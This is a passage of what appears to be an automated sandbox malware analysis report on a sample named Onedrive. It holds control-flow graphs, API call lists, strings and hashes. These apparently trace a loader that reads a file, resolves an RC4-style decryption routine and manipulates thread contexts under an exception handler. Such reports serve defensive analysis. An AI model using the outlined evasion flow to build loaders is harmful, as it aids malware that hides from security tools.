7ff8a0303184 28326->28327 28328 7ff8a03031d0 IsProcessorFeaturePresent 28326->28328 28327->28311 28329 7ff8a03031e8 28328->28329 28334 7ff8a0303410 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 28329->28334 28331 7ff8a03031fb 28335 7ff8a0303190 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 28331->28335 28333 7ff8a030329d 28333->28311 28334->28331 28335->28333 28339 7ff8a030443e 28336->28339 28338 7ff8a0303b0f 28338->28317 28342 7ff8a03043b0 8 API calls 2 library calls 28338->28342 28339->28338 28340 7ff8a0304478 28339->28340 28344 7ff8a0305640 6 API calls __vcrt_initialize_locks 28339->28344 28345 7ff8a03044a0 DeleteCriticalSection 28340->28345 28342->28319 28343->28317 28344->28339 28345->28338 28347 7ff8a032a971 28346->28347 28348 7ff8a03025e1 28346->28348 28347->28348 28350 7ff8a0321190 28347->28350 28348->28305 28348->28324 28361 7ff8a0326620 EnterCriticalSection 28350->28361 28352 7ff8a032119e 28362 7ff8a0330510 28352->28362 28354 7ff8a03211aa 28360 7ff8a03211ae 28354->28360 28370 7ff8a0320e40 11 API calls 28354->28370 28357 7ff8a03211b5 28371 7ff8a0320ff0 GetStdHandle GetFileType 28357->28371 28359 7ff8a03211c9 28359->28347 28372 7ff8a03266b0 LeaveCriticalSection 28360->28372 28361->28352 28363 7ff8a0330522 28362->28363 28368 7ff8a0330584 28363->28368 28373 7ff8a0326620 EnterCriticalSection 28363->28373 28365 7ff8a0330636 28379 7ff8a03266b0 LeaveCriticalSection 28365->28379 28367 7ff8a03305d4 28367->28365 28374 7ff8a03302d0 28367->28374 28368->28354 28370->28357 28371->28360 28372->28359 28373->28367 28380 7ff8a031ce10 28374->28380 28376 7ff8a03302f8 Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock Concurrency::details::_Scheduler::_Scheduler type_info::_name_internal_method 28377 7ff8a0330316 __crt_unique_heap_ptr type_info::_name_internal_method 28376->28377 28384 7ff8a031fda0 6 API calls 28376->28384 28377->28367 28379->28368 28381 7ff8a031ce30 28380->28381 28382 7ff8a031ce45 memcpy_s 28381->28382 28385 7ff8a031b500 28381->28385 28382->28376 28384->28377 28389 7ff8a031b51c _get_purecall_handler 28385->28389 28388 7ff8a031b55a 28388->28382 28389->28388 28390 7ff8a031b5a0 28389->28390 28397 7ff8a032ab00 EnterCriticalSection LeaveCriticalSection new[] 28389->28397 28398 7ff8a0326620 EnterCriticalSection 28390->28398 28392 7ff8a031b5ca new[] 28393 7ff8a031b664 _CrtDumpMemoryLeaks memcpy_s 28392->28393 28394 7ff8a031b785 HeapAlloc 28392->28394 28399 7ff8a03266b0 LeaveCriticalSection 28393->28399 28394->28393 28396 7ff8a031b9e3 28396->28389 28397->28389 28398->28392 28399->28396 28400 7ff8a0301010 CreateFileA 28401 7ff8a03013b3 28400->28401 28402 7ff8a030105e GetFileSize 28400->28402 28403 7ff8a0301084 VirtualAlloc 28402->28403 28404 7ff8a03013ee CloseHandle 28402->28404 28403->28404 28405 7ff8a03010a6 ReadFile 28403->28405 28404->28401 28406 7ff8a03010c6 28405->28406 28407 7ff8a03013dd VirtualFree 28405->28407 28406->28407 28408 7ff8a03010cf CloseHandle LoadLibraryW GetProcAddress 28406->28408 28407->28404 28409 7ff8a0301116 28408->28409 28410 7ff8a0301100 VirtualFree 28408->28410 28435 7ff8a0301590 28409->28435 28410->28401 28412 7ff8a030119d 28412->28401 28413 7ff8a03011a5 GetModuleHandleW GetProcAddress 28412->28413 28413->28401 28414 7ff8a03011da 28413->28414 28438 7ff8a0301860 28414->28438 28417 7ff8a0301208 NtQuerySecurityObject 28418 7ff8a030124d GetModuleHandleW GetProcAddress 28417->28418 28430 7ff8a0301243 28417->28430 28418->28401 28419 7ff8a0301276 28418->28419 28421 7ff8a0301860 7 API calls 28419->28421 28422 7ff8a03012a0 28421->28422 28422->28401 28423 7ff8a03012a8 NtQuerySecurityObject 28422->28423 28425 7ff8a03012e9 28423->28425 28423->28430 28424 7ff8a030131a GetModuleHandleW GetProcAddress 28424->28401 28426 7ff8a030133f 28424->28426 28425->28424 28425->28425 28427 7ff8a0301860 7 API calls 28426->28427 28428 7ff8a0301364 28427->28428 28428->28401 28429 7ff8a0301368 NtQuerySecurityObject 28428->28429 28429->28430 28431 7ff8a03013ba SleepEx 28429->28431 28447 7ff8a0301430 62 API calls _vswprintf_s_l 28430->28447 28444 7ff8a0301550 DeleteCriticalSection 28431->28444 28434 7ff8a03013d0 SleepEx 28434->28434 28436 7ff8a03015d3 28435->28436 28437 7ff8a030159e InitializeCriticalSection AddVectoredExceptionHandler 28435->28437 28436->28412 28437->28412 28439 7ff8a0301887 28438->28439 28443 7ff8a0301200 28438->28443 28439->28443 28448 7ff8a03017e0 EnterCriticalSection LeaveCriticalSection 28439->28448 28441 7ff8a030192f GetCurrentThreadId 28442 7ff8a03015e0 OpenThread GetThreadContext SetThreadContext CloseHandle 28441->28442 28442->28443 28443->28401 28443->28417 28445 7ff8a03013ca 28444->28445 28446 7ff8a030156d RemoveVectoredExceptionHandler 28444->28446 28445->28401 28445->28434 28446->28445 28447->28401 28449 7ff8a0302039 28452 7ff8a0302120 28449->28452 28451 7ff8a030203e 28453 7ff8a030214a 28452->28453 28455 7ff8a0302137 28452->28455 28456 7ff8a0302060 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 28453->28456 28455->28451 28456->28455

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 7ff8a0301010-7ff8a0301058 CreateFileA 1 7ff8a0301407-7ff8a0301412 0->1 2 7ff8a030105e-7ff8a030107e GetFileSize 0->2 3 7ff8a0301084-7ff8a03010a0 VirtualAlloc 2->3 4 7ff8a03013ee-7ff8a03013f1 CloseHandle 2->4 3->4 6 7ff8a03010a6-7ff8a03010c0 ReadFile 3->6 5 7ff8a03013f7-7ff8a03013ff 4->5 5->1 7 7ff8a03010c6-7ff8a03010c9 6->7 8 7ff8a03013dd-7ff8a03013e8 VirtualFree 6->8 7->8 9 7ff8a03010cf-7ff8a03010fe CloseHandle LoadLibraryW GetProcAddress 7->9 8->4 10 7ff8a0301116-7ff8a030119f call 7ff8a0301590 9->10 11 7ff8a0301100-7ff8a0301111 VirtualFree 9->11 15 7ff8a03011a5-7ff8a03011d4 GetModuleHandleW GetProcAddress 10->15 16 7ff8a03013b3-7ff8a03013b8 10->16 11->5 15->16 17 7ff8a03011da-7ff8a0301202 call 7ff8a0301860 15->17 16->5 17->16 20 7ff8a0301208-7ff8a0301241 NtQuerySecurityObject 17->20 21 7ff8a0301243-7ff8a0301248 20->21 22 7ff8a030124d-7ff8a0301270 GetModuleHandleW GetProcAddress 20->22 23 7ff8a03013a4-7ff8a03013ae call 7ff8a0301430 21->23 22->16 24 7ff8a0301276-7ff8a03012a2 call 7ff8a0301860 22->24 23->16 24->16 28 7ff8a03012a8-7ff8a03012dd NtQuerySecurityObject 24->28 29 7ff8a03012df-7ff8a03012e4 28->29 30 7ff8a03012e9-7ff8a03012f7 28->30 29->23 31 7ff8a030131a-7ff8a030133d GetModuleHandleW GetProcAddress 30->31 32 7ff8a03012f9 30->32 31->16 34 7ff8a030133f-7ff8a0301366 call 7ff8a0301860 31->34 33 7ff8a0301300-7ff8a0301318 32->33 33->31 33->33 34->16 37 7ff8a0301368-7ff8a030139d NtQuerySecurityObject 34->37 38 7ff8a030139f 37->38 39 7ff8a03013ba-7ff8a03013cc SleepEx call 7ff8a0301550 37->39 38->23 39->16 42 7ff8a03013ce 39->42 43 7ff8a03013d0-7ff8a03013db SleepEx 42->43 43->43
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: FileHandleVirtual$AddressCloseFreeProc$AllocCreateLibraryLoadModuleObjectQueryReadSecuritySize
                                        • String ID: @$NTDLL.DLL$NtQuerySecurityObject$SystemFunction033$[!] 0x%0.8X Failed With Error: 0x%0.8X $advapi32.dll$ahrm$jnui$onedrive.dll$oyty$sztw$vhps$vnzj$xcha$zhww
                                        • API String ID: 871153514-2486118554
                                        • Opcode ID: 0ac7f9eabe81cef257cbea7df8756715c20c55e09b58fdf4186fe0a0c9f03c50
                                        • Instruction ID: 3130453d506ab6a47489971c0b760aeeff560a78905c87becc75bbffafb05fdd
                                        • Opcode Fuzzy Hash: 0ac7f9eabe81cef257cbea7df8756715c20c55e09b58fdf4186fe0a0c9f03c50
                                        • Instruction Fuzzy Hash: 21B18D36A0BF43A5E7208F65E85076A37A4FB457D4F504239EA9D2ABA4DF3CE105C700

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 44 7ff6104f1384-7ff6104f1444 call 7ff6104fef91 call 7ff6104f9cac * 2 EventRegister 51 7ff6104f1446-7ff6104f1462 EventSetInformation 44->51 52 7ff6104f1467-7ff6104f1488 44->52 51->52 53 7ff6104f148a-7ff6104f148d 52->53 54 7ff6104f14c8-7ff6104f14cb 52->54 53->54 55 7ff6104f148f-7ff6104f1498 53->55 56 7ff6104f14d2-7ff6104f14df 54->56 55->54 57 7ff6104f149a-7ff6104f14c6 EventActivityIdControl 55->57 58 7ff6104f1552-7ff6104f1566 SLOpen 56->58 59 7ff6104f14e1-7ff6104f14e4 56->59 57->56 60 7ff6104f1568-7ff6104f156a call 7ff6104f1d10 58->60 61 7ff6104f1577-7ff6104f158f SLpIsCurrentInstalledProductKeyDefaultKey 58->61 59->58 62 7ff6104f14e6-7ff6104f14ef 59->62 66 7ff6104f156f-7ff6104f1572 60->66 61->60 64 7ff6104f1591-7ff6104f1595 61->64 62->58 65 7ff6104f14f1-7ff6104f14f8 62->65 67 7ff6104f159c-7ff6104f15ae RoInitialize 64->67 68 7ff6104f1597-7ff6104f159a 64->68 69 7ff6104f14fa-7ff6104f1501 65->69 70 7ff6104f1527 65->70 72 7ff6104f16ef-7ff6104f16fd 66->72 67->60 73 7ff6104f15b0-7ff6104f15b3 67->73 68->66 74 7ff6104f1503-7ff6104f150a 69->74 75 7ff6104f151e-7ff6104f1525 69->75 71 7ff6104f152a-7ff6104f154d call 7ff6104f1008 70->71 71->58 77 7ff6104f16ff-7ff6104f1706 72->77 78 7ff6104f1746-7ff6104f1775 EventUnregister call 7ff6104f1c50 72->78 80 7ff6104f15b5-7ff6104f15c4 call 7ff6104f1d10 73->80 81 7ff6104f15c9-7ff6104f15e2 CommandLineToArgvW 73->81 74->75 76 7ff6104f150c-7ff6104f1513 74->76 75->71 76->75 83 7ff6104f1515-7ff6104f151c 76->83 77->78 84 7ff6104f1708-7ff6104f1719 77->84 97 7ff6104f1787-7ff6104f17aa call 7ff6104f9b6c * 2 78->97 98 7ff6104f1777-7ff6104f1783 SLClose 78->98 94 7ff6104f16e3-7ff6104f16ea RoUninitialize 80->94 85 7ff6104f15e4-7ff6104f15f2 GetLastError 81->85 86 7ff6104f1615-7ff6104f1628 call 7ff6104f18a4 81->86 83->70 83->75 84->78 89 7ff6104f171b-7ff6104f1741 call 7ff6104f1008 84->89 90 7ff6104f15f4-7ff6104f15f9 85->90 91 7ff6104f15fb-7ff6104f1606 85->91 102 7ff6104f162e-7ff6104f1644 ChangeWindowMessageFilter 86->102 103 7ff6104f162a-7ff6104f162c 86->103 89->78 96 7ff6104f1609 90->96 91->96 94->72 100 7ff6104f160b-7ff6104f1610 call 7ff6104f1d10 96->100 114 7ff6104f17b0-7ff6104f17b6 97->114 98->97 100->94 102->85 106 7ff6104f1646-7ff6104f1657 call 7ff6104f7b1c 102->106 103->100 112 7ff6104f16bd-7ff6104f16d7 GetMessageW 106->112 113 7ff6104f1659 106->113 115 7ff6104f165b-7ff6104f1662 112->115 116 7ff6104f16d9-7ff6104f16e0 call 7ff6104f1c50 112->116 113->103 117 7ff6104f17cc-7ff6104f17d4 114->117 118 7ff6104f17b8-7ff6104f17c9 114->118 120 7ff6104f1664-7ff6104f1671 115->120 121 7ff6104f169d-7ff6104f16b8 TranslateMessage DispatchMessageW 115->121 116->94 117->114 119 7ff6104f17d6-7ff6104f17dd 117->119 118->117 124 7ff6104f17ef-7ff6104f17fa 119->124 125 7ff6104f17df-7ff6104f17eb CloseHandle 119->125 126 7ff6104f1673-7ff6104f1686 call 7ff6104f7f30 120->126 127 7ff6104f1689-7ff6104f1693 120->127 121->112 129 7ff6104f180f-7ff6104f1816 124->129 130 7ff6104f17fc-7ff6104f180b UnregisterWaitEx 124->130 125->124 126->127 127->121 133 7ff6104f182b-7ff6104f1832 129->133 134 7ff6104f1818-7ff6104f1827 UnregisterWaitEx 129->134 130->129 135 7ff6104f1844-7ff6104f184b 133->135 136 7ff6104f1834-7ff6104f1840 CloseHandle 133->136 134->133 137 7ff6104f185d-7ff6104f1860 135->137 138 7ff6104f184d-7ff6104f1859 CloseHandle 135->138 136->135 139 7ff6104f1862-7ff6104f186c LocalFree 137->139 140 7ff6104f1871-7ff6104f189b call 7ff6104fe7d0 137->140 138->137 139->140
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Event$CloseMessage$HandleUnregister$RegisterWait$ActivityArgvChangeCommandControlCurrentDefaultDispatchErrorFilterFreeInformationInitializeInstalledLastLineLocalOpenProductTranslateUninitializeWindow
                                        • String ID:
                                        • API String ID: 4262568299-0
                                        • Opcode ID: 057ad605cfa734ea69936c5c81ee5022b13314d1383440f342be20a475843f21
                                        • Instruction ID: 3ab7cc0c5644bf2a8cfbca38bbc3462b3fcd44b1a5f5c3b608fa6230481a8051
                                        • Opcode Fuzzy Hash: 057ad605cfa734ea69936c5c81ee5022b13314d1383440f342be20a475843f21
                                        • Instruction Fuzzy Hash: 0CE13831A08E42EAEF109B25E9901BC37A5FF8AFA8B549535D90EC7768CF3CE4558350

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 143 7ff8a031b5a0-7ff8a031b5e1 call 7ff8a0326620 call 7ff8a031c600 148 7ff8a031b5f0-7ff8a031b5f8 143->148 149 7ff8a031b5e3-7ff8a031b5ed 143->149 151 7ff8a031b5fe-7ff8a031b662 148->151 152 7ff8a031b6e0-7ff8a031b6ef 148->152 149->148 150 7ff8a031b5ef 149->150 150->148 151->152 160 7ff8a031b664-7ff8a031b66d 151->160 153 7ff8a031b6f1-7ff8a031b6fc 152->153 154 7ff8a031b705 152->154 153->154 155 7ff8a031b6fe-7ff8a031b703 153->155 156 7ff8a031b70a-7ff8a031b71c 154->156 155->156 158 7ff8a031b71e-7ff8a031b72e call 7ff8a031f4b0 156->158 159 7ff8a031b740-7ff8a031b751 call 7ff8a031bb40 156->159 169 7ff8a031b73b 158->169 170 7ff8a031b730-7ff8a031b735 158->170 172 7ff8a031b753-7ff8a031b780 call 7ff8a031ef40 159->172 173 7ff8a031b785-7ff8a031b7bb HeapAlloc 159->173 163 7ff8a031b6ac-7ff8a031b6d6 call 7ff8a031ef40 160->163 164 7ff8a031b66f-7ff8a031b6a5 call 7ff8a031ef40 160->164 179 7ff8a031b6d8-7ff8a031b6d9 163->179 180 7ff8a031b6db 163->180 175 7ff8a031b6aa 164->175 176 7ff8a031b6a7-7ff8a031b6a8 164->176 177 7ff8a031b9dc-7ff8a031b9ef call 7ff8a03266b0 169->177 170->169 172->173 191 7ff8a031b782-7ff8a031b783 172->191 181 7ff8a031b7bd-7ff8a031b7cd call 7ff8a031f4b0 173->181 182 7ff8a031b7df-7ff8a031b7f4 173->182 175->180 176->175 179->180 180->177 196 7ff8a031b7da 181->196 197 7ff8a031b7cf-7ff8a031b7d4 181->197 183 7ff8a031b856-7ff8a031b86c 182->183 184 7ff8a031b7f6-7ff8a031b851 182->184 189 7ff8a031b88c 183->189 190 7ff8a031b86e-7ff8a031b88a 183->190 188 7ff8a031b96d-7ff8a031b9d7 call 7ff8a0340200 call 7ff8a031a300 call 7ff8a0340200 call 7ff8a031a300 call 7ff8a0340200 call 7ff8a031a300 184->188 188->177 194 7ff8a031b897-7ff8a031b8c1 189->194 190->194 191->173 198 7ff8a031b8d1-7ff8a031b8d9 194->198 199 7ff8a031b8c3-7ff8a031b8ca 194->199 196->177 197->196 201 7ff8a031b8db-7ff8a031b8eb 198->201 202 7ff8a031b8ed-7ff8a031b8f2 198->202 199->198 204 7ff8a031b8f9-7ff8a031b966 201->204 202->204 204->188
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: __vcrt_lock$AllocCriticalEnterHeapSection
                                        • String ID: Client hook allocation failure at file %hs line %d.$Client hook allocation failure.$Error: memory allocation: bad memory block type.
                                        • API String ID: 3996555514-2973468218
                                        • Opcode ID: b588652198e2ba0bab837f12bb7a4c46ddb51b8bf420c0f2ff2df4b1385cc741
                                        • Instruction ID: 0436b4644218b7e537965bbc8e6d2ee2f88a874dd515efcc779e10b4a9839a35
                                        • Opcode Fuzzy Hash: b588652198e2ba0bab837f12bb7a4c46ddb51b8bf420c0f2ff2df4b1385cc741
                                        • Instruction Fuzzy Hash: 2BC1D936A0EF8699EB608B19E48036A77A0FB897D5F104535DA9D47BA8DF3DE440CB00
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000003.2239529457.0000021BD8F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021BD8F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_3_21bd8f80000_Onedrive.jbxd
                                        Similarity
                                        • API ID: MemoryVirtual$AllocateProtect
                                        • String ID:
                                        • API String ID: 2931642484-0
                                        • Opcode ID: 670168b2314164816ad4fff62a771d92f35dcb7a52677c9802cb5d6c25b1cd75
                                        • Instruction ID: 7453a562f9550636c5be81d4e041a5e1d4a3ad72adfc66e1bf2017f253fd989e
                                        • Opcode Fuzzy Hash: 670168b2314164816ad4fff62a771d92f35dcb7a52677c9802cb5d6c25b1cd75
                                        • Instruction Fuzzy Hash: 4F712670618A084BE71CAB18F8467AA77F1FBD5711F50463DF98BC3292DB74D8428682

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 214 7ff6104fe530-7ff6104fe56c GetStartupInfoW 215 7ff6104fe56f-7ff6104fe57a 214->215 216 7ff6104fe57c-7ff6104fe57f 215->216 217 7ff6104fe597 215->217 218 7ff6104fe581-7ff6104fe588 216->218 219 7ff6104fe58a-7ff6104fe595 Sleep 216->219 220 7ff6104fe59c-7ff6104fe5a4 217->220 218->220 219->215 221 7ff6104fe5b4-7ff6104fe5bc 220->221 222 7ff6104fe5a6-7ff6104fe5b2 _amsg_exit 220->222 224 7ff6104fe615 221->224 225 7ff6104fe5be-7ff6104fe5da 221->225 223 7ff6104fe620-7ff6104fe628 222->223 227 7ff6104fe62a-7ff6104fe63d _initterm 223->227 228 7ff6104fe647-7ff6104fe649 223->228 226 7ff6104fe61b 224->226 229 7ff6104fe5de-7ff6104fe5e1 225->229 226->223 227->228 230 7ff6104fe655-7ff6104fe65c 228->230 231 7ff6104fe64b-7ff6104fe64e 228->231 232 7ff6104fe5e3-7ff6104fe5e5 229->232 233 7ff6104fe607-7ff6104fe609 229->233 236 7ff6104fe65e-7ff6104fe66c call 7ff6104fed10 230->236 237 7ff6104fe688-7ff6104fe695 230->237 231->230 234 7ff6104fe60b-7ff6104fe610 232->234 235 7ff6104fe5e7-7ff6104fe5ea 232->235 233->226 233->234 242 7ff6104fe776-7ff6104fe793 234->242 238 7ff6104fe5fc-7ff6104fe605 235->238 239 7ff6104fe5ec-7ff6104fe5f8 235->239 236->237 246 7ff6104fe66e-7ff6104fe67e 236->246 240 7ff6104fe6a1-7ff6104fe6a6 237->240 241 7ff6104fe697-7ff6104fe69c 237->241 238->229 239->238 245 7ff6104fe6aa-7ff6104fe6b1 240->245 241->242 248 7ff6104fe6b3-7ff6104fe6b6 245->248 249 7ff6104fe727-7ff6104fe72b 245->249 246->237 252 7ff6104fe6bc-7ff6104fe6c2 248->252 253 7ff6104fe6b8-7ff6104fe6ba 248->253 250 7ff6104fe72d-7ff6104fe737 249->250 251 7ff6104fe73b-7ff6104fe744 249->251 250->251 251->245 254 7ff6104fe6c4-7ff6104fe6d0 252->254 255 7ff6104fe6d2-7ff6104fe6f4 call 7ff6104f1384 252->255 253->249 253->252 254->252 257 7ff6104fe6f9-7ff6104fe706 255->257 258 7ff6104fe710-7ff6104fe717 257->258 259 7ff6104fe708-7ff6104fe70a exit 257->259 260 7ff6104fe725 258->260 261 7ff6104fe719-7ff6104fe71f _cexit 258->261 259->258 260->242 261->260
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_cexit_inittermexit
                                        • String ID:
                                        • API String ID: 642454821-0
                                        • Opcode ID: dcccb8e6faa13e6eb85182caefda4e784d42338a70b9cfa3f9f0163e6fa78336
                                        • Instruction ID: 94cdfe4bdb885364addfa5d7e2c13c985a7cb23b3a93565421e2e8171a26568f
                                        • Opcode Fuzzy Hash: dcccb8e6faa13e6eb85182caefda4e784d42338a70b9cfa3f9f0163e6fa78336
                                        • Instruction Fuzzy Hash: FA613D21A0DE06E2FF709B1AE68023932A8FB58FA9F540435D94DC7798DF3CE9618701

                                        Control-flow Graph

                                        APIs
                                        • __vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A03305CF
                                          • Part of subcall function 00007FF8A0326620: EnterCriticalSection.KERNEL32(?,?,?,?,00007FF8A0318375,?,?,?,?,00007FF8A0318062), ref: 00007FF8A0326641
                                        • __vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A0330656
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: __vcrt_lock$CriticalEnterSection
                                        • String ID: %ls$__acrt_lowio_ensure_fh_exists$minkernel\crts\ucrt\src\appcrt\lowio\osfinfo.cpp$static_cast<unsigned>(fh) < _NHANDLE_
                                        • API String ID: 3216741998-2342959244
                                        • Opcode ID: ae640927d60817160271a2714da284d25e7b7308b8c6acd019e82179aa0bfa48
                                        • Instruction ID: 54c72fa1310eb3cab1636b50be2edac481ed5afa95bfcd72f7871be961104c4f
                                        • Opcode Fuzzy Hash: ae640927d60817160271a2714da284d25e7b7308b8c6acd019e82179aa0bfa48
                                        • Instruction Fuzzy Hash: 92313672A1EE43AAF7109B10E49076A77A0FB84384F502139E68E4B7A9CF3DE454CB01

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Thread$Context$CloseHandleOpen
                                        • String ID:
                                        • API String ID: 3699202265-0
                                        • Opcode ID: d4c4d1f31c04e89d8440c4e2001154f5e439df317c5423af91eed40023814fc9
                                        • Instruction ID: 303a20a4535ff55d38afa8e3f0e5c6f694361cefc80f39cf53d64bec039027fe
                                        • Opcode Fuzzy Hash: d4c4d1f31c04e89d8440c4e2001154f5e439df317c5423af91eed40023814fc9
                                        • Instruction Fuzzy Hash: C151D532A14BC189E320CF65ED402DDB7FDFBA5388F10531AEA9856EA9DF7491A0C740

                                        Control-flow Graph

                                        APIs
                                        • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A0330300
                                          • Part of subcall function 00007FF8A03039B0: __crt_scoped_stack_ptr.LIBCPMTD ref: 00007FF8A03039BE
                                          • Part of subcall function 00007FF8A03085F0: __crt_unique_heap_ptr.LIBCMTD ref: 00007FF8A03085FE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Concurrency::details::_SchedulerScheduler::___crt_scoped_stack_ptr__crt_unique_heap_ptr
                                        • String ID: minkernel\crts\ucrt\src\appcrt\lowio\osfinfo.cpp
                                        • API String ID: 1054307577-534659383
                                        • Opcode ID: bf5abb50213b255653cb25fdc270292517b4292bdca5e9645a15d9283761075a
                                        • Instruction ID: 2f9fe802b467e63ff842b4e42c3a56bea65faf201447b1fa2dbc48cb24b2966b
                                        • Opcode Fuzzy Hash: bf5abb50213b255653cb25fdc270292517b4292bdca5e9645a15d9283761075a
                                        • Instruction Fuzzy Hash: 7D414D2262EB8195DB80CB1AE09136EBB60E7C57D4F542126FBCE47BA6CF7DC5418B01

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
